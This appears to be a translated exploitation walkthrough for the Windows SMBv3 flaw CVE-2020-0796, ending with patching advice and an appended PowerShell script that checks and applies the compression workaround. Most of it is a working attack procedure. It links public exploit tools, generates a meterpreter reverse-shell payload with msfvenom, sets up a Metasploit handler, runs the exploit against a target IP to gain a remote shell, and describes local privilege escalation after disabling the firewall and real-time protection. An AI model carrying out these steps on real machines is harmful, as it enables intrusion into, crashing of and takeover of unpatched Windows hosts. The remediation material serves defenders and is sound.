Vulnerability description
There is a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol processes certain requests, also known as the "Windows SMBv3 client/server remote code execution vulnerability".
Affected versions
- Windows 10 version 1903 for 32-bit systems
- Windows 10 version 1903 (for ARM64-based systems)
- Windows 10 version 1903 (for x64-based systems)
- Windows 10 version 1909 for 32-bit systems
- Windows 10 version 1909 (for ARM64-based systems)
- Windows 10 version 1909 (for x64-based systems)
- Windows Server version 1903 (Server Core installation)
- Windows Server version 1909 (Server Core installation)
Vulnerability detection
Use tool:
https://github.com/GuoKerS/aioScan_CVE-2020-0796
Instructions:
# Install the Python module
python3 -m pip install netaddr
# Script usage: python3 aioscan_2020_0796.py <ip>
python3 aioscan_2020_0796.py 192.168.206.137
If the output shows Vulnerable!!, the host is vulnerable.
Exploit
Windows 10 version 1903 (for x64-based systems) Thunder download address:
thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZMTlfwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZMTlfwOi8v
Blue screen attack
Use tool:
https://github.com/eerykitty/CVE-2020-0796-PoC
Usage:
# Enter the downloaded script directory and install the Python modules
python3 -m pip install -r requirements-test.txt
python3 -m pip install ntlm_auth pyasn1 cryptography
# Script usage
# python3 CVE-2020-0796.py <ip>
python3 CVE-2020-0796.py 192.168.206.137
Remote code execution
Python version: 3.6.6
The script requires Python 3.6. When run under Python 3.7 or later it only blue-screens the target and does not execute remote commands.
Download link: https://www.python.org/downloads/release/python-366/
Use tool:
https://github.com/chompie1337/SMBGhost_RCE_PoC
After downloading the tool, first generate the shellcode of the reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f py -o shellcode.txt
Open shellcode.txt and rename the variable buf to USER_PAYLOAD (tip: a Windows text editor's find-and-replace can do this).
Copy the renamed shellcode into the exploit.py file we downloaded, replacing the existing USER_PAYLOAD.
On Kali, start the msf handler:
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run
Run the exploit script:
python36 exploit.py -ip 192.168.206.141
When the script prints [+] Press a key to execute shellcode!, press Enter. msf then receives the session, and typing shell drops to a command shell on the target:
shell
Local escalation
Download the exploit:
https://github.com/danigargu/CVE-2020-0796
An exe has to be built, which requires Visual Studio.
After downloading, open Visual Studio, load the project via the CVE-2020-0796.sln file and build it. The generated exe is placed in the \x64\Debug\ folder of the exploit directory.
To copy the exe to the Windows 10 target, the firewall and real-time protection have to be turned off.
Usage:
The exe can be run directly.
Repair suggestions
- Update Windows or install the patch promptly: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
- Run regedit.exe to open the Registry Editor, navigate to HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters, create a DWORD value named DisableCompression and set it to 1. This disables the SMBv3 compression feature.
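The registry workaround above as an added PowerShell example (not from the original page or any of the linked tools): run in an elevated PowerShell on the host, it reports whether the local build is one of the listed affected versions, reads the current state of DisableCompression, and writes the value only when started with -Apply. The build-number mapping (18362 = 1903, 18363 = 1909) is an assumption added here.

```powershell
# Added example: audit and apply the DisableCompression workaround on the local host.
# Path, value name and data (DisableCompression = 1) are those given on the page;
# the build-to-version mapping below is an assumption, not from the page.
param([switch]$Apply)

$path = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$name = 'DisableCompression'

# Builds of the affected versions listed above (assumed mapping: 18362 = 1903, 18363 = 1909)
$affectedBuilds = @{ 18362 = '1903'; 18363 = '1909' }
$build = [int](Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').CurrentBuildNumber
if ($affectedBuilds.ContainsKey($build)) {
    Write-Host "Build $build (version $($affectedBuilds[$build])) is in the affected list; confirm the CVE-2020-0796 update is installed."
} else {
    Write-Host "Build $build is not in the affected list."
}

# Read the current state: a missing value or 0 means SMBv3 compression is still enabled
$current = (Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue).$name
if ($current -eq 1) {
    Write-Host "SMBv3 compression is already disabled ($name = 1)."
} elseif ($Apply) {
    # Create (or overwrite) the DWORD value; no reboot is required for the server to pick it up
    Set-ItemProperty -Path $path -Name $name -Value 1 -Type DWord -Force
    Write-Host "Set $name = 1; SMBv3 compression is now disabled."
} else {
    $state = if ($null -eq $current) { 'absent' } else { $current }
    Write-Host "SMBv3 compression is enabled ($name is $state). Re-run with -Apply to disable it."
}
```

Without -Apply the script only reports, so it can be run as a read-only audit across hosts before the patch is rolled out.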